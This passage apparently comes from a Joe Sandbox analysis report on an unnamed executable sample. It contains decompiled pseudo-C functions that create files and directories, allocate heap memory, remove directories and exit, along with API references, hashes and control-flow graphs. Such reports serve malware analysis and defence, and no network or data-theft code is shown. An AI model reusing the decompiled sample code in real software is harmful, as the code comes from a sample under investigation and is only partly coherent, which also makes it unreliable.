                                                                                                                                                  													E00405FD0(1);
                                                                                                                                                  												}
                                                                                                                                                  												goto L31;
                                                                                                                                                  											} else {
                                                                                                                                                  												E00405FD0(1);
                                                                                                                                                  												_push( *0x40b3b0);
                                                                                                                                                  												_t155 =  *0x40b150; // 0x21d0588
                                                                                                                                                  												E004074F0(_t155);
                                                                                                                                                  												E004074F0(0x40a011);
                                                                                                                                                  												_t157 =  *0x40b184; // 0x21d49e0
                                                                                                                                                  												E004074F0(_t157);
                                                                                                                                                  												E004074F0(0x40a011);
                                                                                                                                                  												_t159 =  *0x40b154; // 0x21d05a0
                                                                                                                                                  												E004074F0(_t159);
                                                                                                                                                  												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  												_t160 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  												_v64 = _v64 + _t160;
                                                                                                                                                  												_t97 = E004036A2( *0x40b14c,  *0x40b3b0);
                                                                                                                                                  												 *0x40b3b0 = 0x24;
                                                                                                                                                  												 *0x40b1a8 = _t97;
                                                                                                                                                  												_t116 =  *0x40b1a8; // 0x0
                                                                                                                                                  												__eflags = _t116 - 7;
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													goto L29;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t98 =  *0x40b3b0; // 0x0
                                                                                                                                                  													_t99 =  *0x40b3b0; // 0x0
                                                                                                                                                  													E00403A79(__eflags,  *0x40b3b0);
                                                                                                                                                  													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  													_t161 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  													 *_t167 =  *_t167 + _t161;
                                                                                                                                                  													_t101 = E00405E15(_t99, _t99);
                                                                                                                                                  													 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  													_t162 =  *0x40a390; // 0x21d06f0
                                                                                                                                                  													 *_t167 =  *_t167 + _t162;
                                                                                                                                                  													E00405E90(_t101, _t98);
                                                                                                                                                  													 *0x40b3b0 = _t98;
                                                                                                                                                  													_push( *0x40b12c);
                                                                                                                                                  													L00403196();
                                                                                                                                                  													ExitProcess(0);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(0x10);
                                                                                                                                                  								E004036A2( *0x40b13c,  *0x40b148);
                                                                                                                                                  								_push( *0x40b12c);
                                                                                                                                                  								L00403196();
                                                                                                                                                  								ExitProcess(1);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L38:
                                                                                                                                                  					HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                  					ExitProcess(??); // executed
                                                                                                                                                  					E00403B0B();
                                                                                                                                                  					E00403DB0(E00403CC0());
                                                                                                                                                  					E00404150();
                                                                                                                                                  					E00404A13(_t122);
                                                                                                                                                  					return E0040681C(E00406030());
                                                                                                                                                  				}
                                                                                                                                                  				_push( *0x40b12c);
                                                                                                                                                  				L00403196();
                                                                                                                                                  				ExitProcess(0);
                                                                                                                                                  				goto L38;
                                                                                                                                                  			}




































































                                                                                                                                                  0x004015dd
                                                                                                                                                  0x004015dd
                                                                                                                                                  0x00401672
                                                                                                                                                  0x004015ba
                                                                                                                                                  0x004015c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015e7
                                                                                                                                                  0x004015ea
                                                                                                                                                  0x00401630
                                                                                                                                                  0x00401633
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401635
                                                                                                                                                  0x0040163a
                                                                                                                                                  0x00401640
                                                                                                                                                  0x00401643
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401645
                                                                                                                                                  0x00401645
                                                                                                                                                  0x00401651
                                                                                                                                                  0x0040165c
                                                                                                                                                  0x0040165d
                                                                                                                                                  0x00401667
                                                                                                                                                  0x0040166c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040166c
                                                                                                                                                  0x00401643
                                                                                                                                                  0x004015ec
                                                                                                                                                  0x004015f1
                                                                                                                                                  0x004015f7
                                                                                                                                                  0x004015fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015fc
                                                                                                                                                  0x004015fc
                                                                                                                                                  0x00401608
                                                                                                                                                  0x00401613
                                                                                                                                                  0x00401614
                                                                                                                                                  0x0040161e
                                                                                                                                                  0x00401623
                                                                                                                                                  0x00401678
                                                                                                                                                  0x00401678
                                                                                                                                                  0x0040167d
                                                                                                                                                  0x00401685
                                                                                                                                                  0x0040168b
                                                                                                                                                  0x00401691
                                                                                                                                                  0x00401696
                                                                                                                                                  0x0040169c
                                                                                                                                                  0x004016af
                                                                                                                                                  0x004016b4
                                                                                                                                                  0x004016b5
                                                                                                                                                  0x004016b6
                                                                                                                                                  0x004016bc
                                                                                                                                                  0x004016c2
                                                                                                                                                  0x004016c8
                                                                                                                                                  0x004016cd
                                                                                                                                                  0x00401708
                                                                                                                                                  0x0040170d
                                                                                                                                                  0x0040170f
                                                                                                                                                  0x00401711
                                                                                                                                                  0x00401716
                                                                                                                                                  0x00401716
                                                                                                                                                  0x0040171b
                                                                                                                                                  0x00401721
                                                                                                                                                  0x00401727
                                                                                                                                                  0x0040172d
                                                                                                                                                  0x00401733
                                                                                                                                                  0x00401739
                                                                                                                                                  0x0040173f
                                                                                                                                                  0x00401745
                                                                                                                                                  0x0040174b
                                                                                                                                                  0x00401751
                                                                                                                                                  0x00401756
                                                                                                                                                  0x0040175b
                                                                                                                                                  0x00401769
                                                                                                                                                  0x00401774
                                                                                                                                                  0x00401775
                                                                                                                                                  0x0040177a
                                                                                                                                                  0x0040177f
                                                                                                                                                  0x0040178d
                                                                                                                                                  0x00401798
                                                                                                                                                  0x00401799
                                                                                                                                                  0x004017a9
                                                                                                                                                  0x004017ae
                                                                                                                                                  0x004017b0
                                                                                                                                                  0x00401a25
                                                                                                                                                  0x00401a25
                                                                                                                                                  0x00401a2b
                                                                                                                                                  0x00401a31
                                                                                                                                                  0x00401a3b
                                                                                                                                                  0x00401a40
                                                                                                                                                  0x00401a46
                                                                                                                                                  0x00401a4b
                                                                                                                                                  0x00401a51
                                                                                                                                                  0x00401a52
                                                                                                                                                  0x00401a57
                                                                                                                                                  0x00401a62
                                                                                                                                                  0x00401a67
                                                                                                                                                  0x00401a69
                                                                                                                                                  0x00401a8d
                                                                                                                                                  0x00401a92
                                                                                                                                                  0x00401a97
                                                                                                                                                  0x00401aa8
                                                                                                                                                  0x00401aad
                                                                                                                                                  0x00401ab3
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401a6b
                                                                                                                                                  0x00401a76
                                                                                                                                                  0x00401a80
                                                                                                                                                  0x00401ac5
                                                                                                                                                  0x00401acb
                                                                                                                                                  0x00401acb
                                                                                                                                                  0x00401acd
                                                                                                                                                  0x00401ad2
                                                                                                                                                  0x00401ad4
                                                                                                                                                  0x00401ada
                                                                                                                                                  0x00401ada
                                                                                                                                                  0x00401adf
                                                                                                                                                  0x00401ae5
                                                                                                                                                  0x00401aeb
                                                                                                                                                  0x00401af1
                                                                                                                                                  0x00401af6
                                                                                                                                                  0x00401afc
                                                                                                                                                  0x00401b01
                                                                                                                                                  0x00401b07
                                                                                                                                                  0x00401b0d
                                                                                                                                                  0x00401b13
                                                                                                                                                  0x00401b19
                                                                                                                                                  0x00401b1d
                                                                                                                                                  0x00401b22
                                                                                                                                                  0x00401b28
                                                                                                                                                  0x00401b33
                                                                                                                                                  0x00401b3d
                                                                                                                                                  0x00401b3f
                                                                                                                                                  0x00401b4c
                                                                                                                                                  0x00401b51
                                                                                                                                                  0x00401b57
                                                                                                                                                  0x00401b5d
                                                                                                                                                  0x00401b60
                                                                                                                                                  0x00401b65
                                                                                                                                                  0x00401b6b
                                                                                                                                                  0x00401b71
                                                                                                                                                  0x00401b74
                                                                                                                                                  0x00401b79
                                                                                                                                                  0x00401b7f
                                                                                                                                                  0x00401b85
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004017b6
                                                                                                                                                  0x004017b6
                                                                                                                                                  0x004017bb
                                                                                                                                                  0x004017c2
                                                                                                                                                  0x004017c7
                                                                                                                                                  0x004017cd
                                                                                                                                                  0x004017e0
                                                                                                                                                  0x004017e5
                                                                                                                                                  0x004017e6
                                                                                                                                                  0x004017e7
                                                                                                                                                  0x004017ed
                                                                                                                                                  0x004017f3
                                                                                                                                                  0x004017f9
                                                                                                                                                  0x004017fe
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401800
                                                                                                                                                  0x00401800
                                                                                                                                                  0x00401806
                                                                                                                                                  0x00401809
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x00401809
                                                                                                                                                  0x00401814
                                                                                                                                                  0x00401816
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040181c
                                                                                                                                                  0x0040181c
                                                                                                                                                  0x00401823
                                                                                                                                                  0x0040182a
                                                                                                                                                  0x0040182f
                                                                                                                                                  0x0040183b
                                                                                                                                                  0x00401841
                                                                                                                                                  0x00401845
                                                                                                                                                  0x00401850
                                                                                                                                                  0x00401851
                                                                                                                                                  0x00401856
                                                                                                                                                  0x0040185c
                                                                                                                                                  0x0040185c
                                                                                                                                                  0x0040185e
                                                                                                                                                  0x00401863
                                                                                                                                                  0x004019c6
                                                                                                                                                  0x004019c6
                                                                                                                                                  0x004019cd
                                                                                                                                                  0x004019da
                                                                                                                                                  0x004019df
                                                                                                                                                  0x004019e5
                                                                                                                                                  0x004019eb
                                                                                                                                                  0x004019ee
                                                                                                                                                  0x004019f3
                                                                                                                                                  0x004019f9
                                                                                                                                                  0x004019ff
                                                                                                                                                  0x00401a02
                                                                                                                                                  0x00401a07
                                                                                                                                                  0x00401a0d
                                                                                                                                                  0x00401a13
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401869
                                                                                                                                                  0x00401869
                                                                                                                                                  0x0040186f
                                                                                                                                                  0x00401875
                                                                                                                                                  0x00401880
                                                                                                                                                  0x00401881
                                                                                                                                                  0x00401886
                                                                                                                                                  0x0040188c
                                                                                                                                                  0x0040188c
                                                                                                                                                  0x0040188e
                                                                                                                                                  0x00401893
                                                                                                                                                  0x00401895
                                                                                                                                                  0x0040189b
                                                                                                                                                  0x0040189b
                                                                                                                                                  0x004018b0
                                                                                                                                                  0x004018b2
                                                                                                                                                  0x00401998
                                                                                                                                                  0x00401998
                                                                                                                                                  0x004019a8
                                                                                                                                                  0x004019aa
                                                                                                                                                  0x004019b7
                                                                                                                                                  0x004019c1
                                                                                                                                                  0x004019c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004018b8
                                                                                                                                                  0x004018bd
                                                                                                                                                  0x004018c2
                                                                                                                                                  0x004018cd
                                                                                                                                                  0x004018d9
                                                                                                                                                  0x004018e3
                                                                                                                                                  0x004018e8
                                                                                                                                                  0x004018ee
                                                                                                                                                  0x004018f8
                                                                                                                                                  0x004018fd
                                                                                                                                                  0x00401903
                                                                                                                                                  0x00401908
                                                                                                                                                  0x00401914
                                                                                                                                                  0x0040191a
                                                                                                                                                  0x0040191e
                                                                                                                                                  0x00401923
                                                                                                                                                  0x00401929
                                                                                                                                                  0x0040192e
                                                                                                                                                  0x00401934
                                                                                                                                                  0x00401937
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401939
                                                                                                                                                  0x00401939
                                                                                                                                                  0x00401940
                                                                                                                                                  0x0040194d
                                                                                                                                                  0x00401952
                                                                                                                                                  0x00401958
                                                                                                                                                  0x0040195e
                                                                                                                                                  0x00401961
                                                                                                                                                  0x00401966
                                                                                                                                                  0x0040196c
                                                                                                                                                  0x00401972
                                                                                                                                                  0x00401975
                                                                                                                                                  0x0040197a
                                                                                                                                                  0x00401980
                                                                                                                                                  0x00401986
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401937
                                                                                                                                                  0x004018b2
                                                                                                                                                  0x00401863
                                                                                                                                                  0x00401816
                                                                                                                                                  0x004016cf
                                                                                                                                                  0x004016cf
                                                                                                                                                  0x004016e0
                                                                                                                                                  0x004016e5
                                                                                                                                                  0x004016eb
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004016cd
                                                                                                                                                  0x004015fa
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401baf
                                                                                                                                                  0x00401bb4
                                                                                                                                                  0x00401bb9
                                                                                                                                                  0x00401bc3
                                                                                                                                                  0x00401bc8
                                                                                                                                                  0x00401bcd
                                                                                                                                                  0x00401bdc
                                                                                                                                                  0x00401bdc
                                                                                                                                                  0x004015c5
                                                                                                                                                  0x004015cb
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _rmdir.MSVCRT ref: 004015CB
                                                                                                                                                  • _rmdir.MSVCRT ref: 004016EB
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess_rmdir$DestroyHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2349447675-0
                                                                                                                                                  • Opcode ID: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                                                                                                                                  • Instruction ID: f6203454605ce15a78fc4500694886718a1945bc82ad3b924abf98fa16e55a6a
                                                                                                                                                  • Opcode Fuzzy Hash: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                                                                                                                                  • Instruction Fuzzy Hash: B0E01A71114110D5D9407BB3AD83A5E392C9F4831DF50847FF242781F39A7E5655257F
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 559 401b95-401bb4 FreeLibrary ExitProcess HeapDestroy ExitProcess
                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                  			E00401B95(void* __eax, void* __ecx) {
                                                                                                                                                  				void* _t12;
                                                                                                                                                  
                                                                                                                                                  				_t12 = __ecx;
                                                                                                                                                  				FreeLibrary(??);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				ExitProcess();
                                                                                                                                                  				HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                  				ExitProcess(??); // executed
                                                                                                                                                  				E00403B0B();
                                                                                                                                                  				E00403DB0(E00403CC0());
                                                                                                                                                  				E00404150();
                                                                                                                                                  				E00404A13(_t12);
                                                                                                                                                  				return E0040681C(E00406030());
                                                                                                                                                  			}




                                                                                                                                                  0x00401b95
                                                                                                                                                  0x00401b9a
                                                                                                                                                  0x00401b9f
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401baf
                                                                                                                                                  0x00401bb4
                                                                                                                                                  0x00401bb9
                                                                                                                                                  0x00401bc3
                                                                                                                                                  0x00401bc8
                                                                                                                                                  0x00401bcd
                                                                                                                                                  0x00401bdc

                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 00401B9A
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess$DestroyFreeHeapLibrary
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2053948195-0
                                                                                                                                                  • Opcode ID: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                                                                                                                                  • Instruction ID: 8df1d9b4a75efc814e8b2774fb98a4c810adc8e8576d79e7d4d7b84f580b8b4c
                                                                                                                                                  • Opcode Fuzzy Hash: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                                                                                                                                  • Instruction Fuzzy Hash: 85D092701A051184D9407BF35803A4D2C1C4F8870EB4180BFB651381E38E3C4314157F
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 562 406170-4061ab call 40662c CreateFileA 565 4061c6-4061c8 562->565 566 4061ad-4061c4 CreateFileA 562->566 567 406211-406216 565->567 568 4061ca-4061fd RtlAllocateHeap 565->568 566->565 566->567 571 406224-40622a 567->571 572 406218-40621f call 4066bb 567->572 569 406208-40620e 568->569 570 4061ff-406205 568->570 572->571
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406170(void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				CHAR* _v0;
                                                                                                                                                  				intOrPtr _v4;
                                                                                                                                                  				void** _t10;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                  				CHAR* _t19;
                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void** _t23;
                                                                                                                                                  
                                                                                                                                                  				_t20 =  *0x40b43c; // 0x20405a8
                                                                                                                                                  				_t10 = E0040662C(_t20, _a4);
                                                                                                                                                  				_t19 = _v0;
                                                                                                                                                  				_t23 = _t10; // executed
                                                                                                                                                  				_t11 = CreateFileA(_t19, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                                                                  				_t22 = _t11;
                                                                                                                                                  				if(_t22 != 0xffffffff) {
                                                                                                                                                  					L2:
                                                                                                                                                  					if(_t22 == 0) {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					} else {
                                                                                                                                                  						 *_t23 = _t22;
                                                                                                                                                  						_t21 =  *0x40b0f8; // 0x2040000
                                                                                                                                                  						_t23[1] = RtlAllocateHeap(_t21, 0, 0x1000);
                                                                                                                                                  						_t23[2] = 0x1000;
                                                                                                                                                  						_t23[3] = 0;
                                                                                                                                                  						_t23[5] = 1;
                                                                                                                                                  						if(_v4 != 0xffffffff) {
                                                                                                                                                  							return _t22;
                                                                                                                                                  						} else {
                                                                                                                                                  							return _t23;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t22 = CreateFileA(_t19, 0x40000000, 1, 0, 5, 0, 0);
                                                                                                                                                  					if(_t22 == 0xffffffff) {
                                                                                                                                                  						L6:
                                                                                                                                                  						if(_a4 == 0xffffffff) {
                                                                                                                                                  							_t13 =  *0x40b43c; // 0x20405a8
                                                                                                                                                  							E004066BB(_t13, _t23);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}













                                                                                                                                                  0x00406174
                                                                                                                                                  0x00406180
                                                                                                                                                  0x00406185
                                                                                                                                                  0x004061a2
                                                                                                                                                  0x004061a4
                                                                                                                                                  0x004061a6
                                                                                                                                                  0x004061ab
                                                                                                                                                  0x004061c6
                                                                                                                                                  0x004061c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004061ca
                                                                                                                                                  0x004061cf
                                                                                                                                                  0x004061d1
                                                                                                                                                  0x004061e5
                                                                                                                                                  0x004061e8
                                                                                                                                                  0x004061ef
                                                                                                                                                  0x004061f6
                                                                                                                                                  0x004061fd
                                                                                                                                                  0x0040620e
                                                                                                                                                  0x00406200
                                                                                                                                                  0x00406205
                                                                                                                                                  0x00406205
                                                                                                                                                  0x004061fd
                                                                                                                                                  0x004061ad
                                                                                                                                                  0x004061bf
                                                                                                                                                  0x004061c4
                                                                                                                                                  0x00406211
                                                                                                                                                  0x00406216
                                                                                                                                                  0x00406218
                                                                                                                                                  0x0040621f
                                                                                                                                                  0x0040621f
                                                                                                                                                  0x0040622a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004061c4

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,020405A8,00000000,?,?,?,00000000,00401A67,00000001,00000000), ref: 004061A4
                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A67,00000001,00000000,00000000,0040A0C8), ref: 004061BD
                                                                                                                                                  • RtlAllocateHeap.NTDLL(02040000,00000000,00001000), ref: 004061DA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2813278966-0
                                                                                                                                                  • Opcode ID: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                                                                                                                                  • Instruction ID: cfaef28ad908b1f0d4b3848689bff36785735015fc1d85a617d71e6b06036d25
                                                                                                                                                  • Opcode Fuzzy Hash: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                                                                                                                                  • Instruction Fuzzy Hash: C911B67234030066D230AB69AD49F57B798D790B71F11872AF3A1BB2D1C7B6A8548768
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 574 405f13-405f20 575 405f22-405f50 strncpy strlen 574->575 576 405f86 574->576 577 405f68-405f70 575->577 578 405f88-405f89 576->578 579 405f52-405f5a 577->579 580 405f72-405f84 CreateDirectoryA 577->580 581 405f66 579->581 582 405f5c-405f5f 579->582 580->578 581->577 582->581 583 405f61-405f64 582->583 583->580 583->581
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405F13(char* _a4) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v268;
                                                                                                                                                  				char* _t16;
                                                                                                                                                  				int _t18;
                                                                                                                                                  				char* _t20;
                                                                                                                                                  				char _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				strncpy( &_v268, _a4, 0x104);
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t16 = _t22 + strlen( &_v268) - 0x108;
                                                                                                                                                  				while(_t16 >  &_v268) {
                                                                                                                                                  					_t20 = _t16 - 1;
                                                                                                                                                  					_t21 =  *_t20;
                                                                                                                                                  					if(_t21 == 0x20 || _t21 == 0x5c || _t21 == 0x2f) {
                                                                                                                                                  						_t16 = _t20;
                                                                                                                                                  						continue;
                                                                                                                                                  					} else {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				 *_t16 = 0;
                                                                                                                                                  				_t18 = CreateDirectoryA( &_v268, 0); // executed
                                                                                                                                                  				return _t18;
                                                                                                                                                  			}










                                                                                                                                                  0x00405f20
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405f86
                                                                                                                                                  0x00405f31
                                                                                                                                                  0x00405f3d
                                                                                                                                                  0x00405f49
                                                                                                                                                  0x00405f68
                                                                                                                                                  0x00405f52
                                                                                                                                                  0x00405f55
                                                                                                                                                  0x00405f5a
                                                                                                                                                  0x00405f66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405f5a
                                                                                                                                                  0x00405f72
                                                                                                                                                  0x00405f7e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectorystrlenstrncpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2535372781-0
                                                                                                                                                  • Opcode ID: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                                                                                                                                  • Instruction ID: e2a7ac9b00687a60ad497853f81a50efedb75a5df88c79b9acbfe651115fb43f
                                                                                                                                                  • Opcode Fuzzy Hash: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                                                                                                                                  • Instruction Fuzzy Hash: 0401F9319086099EDB21DA24CC89BEB77B99B10344F5400B6E5C4E61D1DBBC9AC8CF1A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 584 4066f1-406737 RtlAllocateHeap * 2
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004066F1(signed int _a4) {
                                                                                                                                                  				signed int _v0;
                                                                                                                                                  				signed int _v4;
                                                                                                                                                  				signed int _t11;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				signed int _t16;
                                                                                                                                                  				signed int* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t18 = RtlAllocateHeap( *0x40b0f8, 8, 0x20);
                                                                                                                                                  				_t11 = _v4;
                                                                                                                                                  				_t18[3] = _t18[3] & 0x00000000;
                                                                                                                                                  				_t18[4] = _a4;
                                                                                                                                                  				_t16 = _v0;
                                                                                                                                                  				 *_t18 = _t11;
                                                                                                                                                  				_t18[1] = _t16;
                                                                                                                                                  				_t18[2] = _t16;
                                                                                                                                                  				_t13 = RtlAllocateHeap( *0x40b0f8, 8, _t11 * _t16); // executed
                                                                                                                                                  				_t18[7] = _t13;
                                                                                                                                                  				return _t18;
                                                                                                                                                  			}









                                                                                                                                                  0x00406709
                                                                                                                                                  0x0040670b
                                                                                                                                                  0x0040670f
                                                                                                                                                  0x00406713
                                                                                                                                                  0x00406716
                                                                                                                                                  0x0040671a
                                                                                                                                                  0x00406722
                                                                                                                                                  0x00406725
                                                                                                                                                  0x0040672e
